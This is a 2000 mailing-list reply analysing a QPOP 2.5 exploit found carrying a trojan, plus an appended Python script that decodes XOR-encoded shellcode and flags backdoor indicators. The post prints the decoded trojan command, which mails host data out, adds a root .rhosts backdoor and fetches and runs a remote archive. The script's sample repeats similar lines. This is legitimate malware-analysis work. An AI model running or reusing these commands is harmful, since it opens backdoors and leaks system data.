Vulnerability Development mailing list archives

Re: QPOP2.5* exploit ??


From: typo () INFERNO TUSCULUM EDU (typo () INFERNO TUSCULUM EDU)
Date: Sun, 14 May 2000 23:18:57 +0200


On Sun, May 14, 2000 at 12:30:03PM -0500, Ryan Sweat wrote:
    This has been found in the wild, however there seems to be a trojan
    in the shellcode. Popper 2.5* has been thought to be safe.
    I would not recommend running this on your own machine unless you crack
    the shellcode and see what it does.

The trojan is XOR encoded and decodes itself. I was unable to obtain
a copy of solwar.tar. tar returns warnings when solwar.tar can't be
retrieved. The shellcode seems to be generated by stealth's hellkit
(available from http://teso.scene.at).

enemy:~# tail -2 as.c; gcc as.c -o as; ./as
main() { char *x; for (x=shellcode; x <= strlen(shellcode)+shellcode; x++)
        printf("%c", *x ^ 2); printf("\n"); }
.../bin/sh-c../sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null; echo '+ +' >> ~root/.rhosts; rcp 
lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar; tar -xvf solwar* >> /dev/null; cd solwar; chmod +x 
solwar.sh; ./solwar.sh >> /dev/null; cd ..; rm -rf solwar...

--
so much entropy, so little time
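The decode above XORs every byte with the key 2 because the poster already knew the decoder stub. As an added example (not from the original post, hellkit, or the exploit itself) the script below does the same single-byte XOR decode, then goes one step further: it recovers an unknown key with a known-plaintext crib (`/bin/sh`, which hellkit-style payloads carry as argv[0]), splits the NUL-separated argv strings, and flags the backdoor indicators seen in the decoded command quoted above (a mailed `ifconfig`, an `.rhosts` entry, an `rcp` pull). The sample blob is constructed for the example and is not the real payload; function names and the `SUSPICIOUS_TOKENS` list are the example's own.

```python
"""Decode a single-byte XOR-encoded exploit payload and flag backdoor indicators.

Added example, not code from the original post or from hellkit.  It mirrors
the `*x ^ 2` decode in the message and adds key recovery via a crib so an
embedded command can be read before anything is executed.
"""
from __future__ import annotations

import string

# Strings a reviewer would expect in a dropped backdoor, taken from the kinds
# of actions in the decoded payload quoted in the post.
SUSPICIOUS_TOKENS = ("| mail", ".rhosts", "rcp ", "rm -rf", "chmod +x")

# Bytes tolerated in a decoded argv blob: printable ASCII plus NUL separators.
ALLOWED = set(string.printable.encode()) | {0}


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; encode and decode are the same op."""
    return bytes(b ^ key for b in data)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or NUL."""
    if not data:
        return 0.0
    return sum(b in ALLOWED for b in data) / len(data)


def recover_key(encoded: bytes, crib: bytes = b"/bin/sh") -> int | None:
    """Return the single-byte key under which the crib appears and the decoded
    text is mostly printable, or None if no key qualifies."""
    best: tuple[int, float] | None = None
    for key in range(256):
        plain = xor_bytes(encoded, key)
        if crib not in plain:
            continue
        ratio = printable_ratio(plain)
        if ratio >= 0.95 and (best is None or ratio > best[1]):
            best = (key, ratio)
    return best[0] if best else None


def split_argv(decoded: bytes) -> list[str]:
    """hellkit-style payloads keep argv strings NUL-separated (the '.' bytes in
    the post's output); split them into readable strings."""
    return [p.decode("ascii", "replace") for p in decoded.split(b"\x00") if p]


def find_indicators(text: str) -> list[str]:
    """Indicator tokens present in the decoded command, in list order."""
    return [t for t in SUSPICIOUS_TOKENS if t in text]


def analyse(encoded: bytes) -> dict:
    """Full pass: recover the key, decode, split argv, flag indicators."""
    key = recover_key(encoded)
    if key is None:
        return {"key": None, "argv": [], "indicators": []}
    argv = split_argv(xor_bytes(encoded, key))
    return {"key": key, "argv": argv, "indicators": find_indicators(" ".join(argv))}


# Constructed sample (not the real payload): argv-style strings encoded with
# key 2, the same key the message's decoder used.
SAMPLE_PLAIN = (b"/bin/sh\x00-c\x00"
                b"/sbin/ifconfig -a | mail -s report nobody@example.invalid; "
                b"echo '+ +' >> ~root/.rhosts\x00")
SAMPLE_ENCODED = xor_bytes(SAMPLE_PLAIN, 2)


if __name__ == "__main__":
    report = analyse(SAMPLE_ENCODED)
    print("key  :", report["key"])
    for i, arg in enumerate(report["argv"]):
        print(f"argv[{i}]: {arg}")
    print("flags:", report["indicators"])
```

To use it on a real sample, paste the exploit's `shellcode[]` bytes into `SAMPLE_ENCODED` and read the printed argv; the crib search only assumes a `/bin/sh` string is present, so a payload using a different shell path needs a different `crib` argument.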
